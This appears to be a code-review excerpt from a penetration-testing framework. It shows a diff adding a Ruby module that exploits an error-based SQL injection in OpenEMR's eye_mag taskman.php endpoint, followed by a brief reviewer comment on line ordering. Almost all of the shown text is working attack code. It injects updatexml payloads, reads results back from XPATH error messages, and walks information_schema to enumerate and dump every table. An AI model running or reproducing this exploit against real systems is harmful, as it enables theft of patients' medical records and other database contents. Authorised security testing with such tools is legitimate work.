modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb

```diff
@@ -0,0 +1,235 @@
+
+  def get_response(payload)
+    path = "#{uri}/interface/forms/eye_mag/taskman.php?action=make_task&from_id=1&to_id=1&pid=1&doc_type=1&doc_id=1&enc=1' and updatexml(1,concat(0x7e, (#{payload})),0) or '"
+    # This is only going to work for spaces.  Ideally we could use URI.encode
+    # but that is deprecated and CGI.escape uses + which doesn't work
+    # for this application.
+    path = path.gsub ' ', '%20'
+    response = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(path)
+    )
+    response.body
+  end
+
+  def parse_xpath_error(response_body)
+    matches = response_body.match %r{.*XPATH syntax error: '~(.*)'</font.*$}
+    return matches[1] if matches
+
+    nil
+  end
+
+  def exec_payload_and_parse(payload)
+    parse_xpath_error(get_response(payload))
+  end
+
+  def complete_where_clause(where_clause, not_in_clause)
+    where_clause ||= ''
+    if !where_clause.empty? && !not_in_clause.empty?
+      where_clause = 'WHERE ' + where_clause + ' AND ' + not_in_clause
+    elsif where_clause.empty? && !not_in_clause.empty?
+      where_clause = 'WHERE ' + not_in_clause
+    elsif !where_clause.empty? && not_in_clause.empty?
+      where_clause = 'WHERE ' + where_clause
+    end
+    where_clause
+  end
+
+  def fetch_complete(column_name, table_name, where_condition, not_in_clause)
+    offset = 0
+    reconstructed_value = ''
+    loop do
+      where_clause = complete_where_clause(where_condition, not_in_clause)
+      payload = "SELECT SUBSTRING(#{column_name}, #{(offset * 31) + 1}) FROM #{table_name} #{where_clause} LIMIT 1"
+      value = exec_payload_and_parse(payload)
+      reconstructed_value += value unless value.nil?
+      break if value.nil? || value.empty? || value.length < 31
+
+      offset += 1
+    end
+    reconstructed_value
+  end
+
+  def enumerate_iteratively(column_name, table_name, where_condition)
+    values = []
+
+    loop do
+      values_sql_string = "'" + values.join("','") + "'"
+      not_in_clause = !values.empty? ? "#{column_name} NOT IN (#{values_sql_string})" : ''
+      value = fetch_complete(column_name, table_name, where_condition, not_in_clause)
+      break if value.nil? || value.empty?
+
+      values.push(value)
+    end
+    values
+  end
+
+  def enumerate_tables
+    enumerate_iteratively('table_name',
+                          'information_schema.TABLES',
+                          '')
+  end
+
+  def enumerate_columns(table)
+    enumerate_iteratively('column_name',
+                          'information_schema.COLUMNS',
+                          "table_name = '#{table}'")
+  end
+
+  def find_primary_key(table)
+    fetch_complete('column_name',
+                   'information_schema.KEY_COLUMN_USAGE',
+                   "table_name = '#{table}' AND CONSTRAINT_NAME ='PRIMARY'",
+                   '')
+  end
+
+  def walk_table(table)
+    primary_key = find_primary_key(table)
+    columns = enumerate_columns(table)
+
+    return if primary_key.nil?
```

Comment:
This could probably be moved up a couple lines.

Presumably, there is no point enumerating columns if the primary key is `nil`.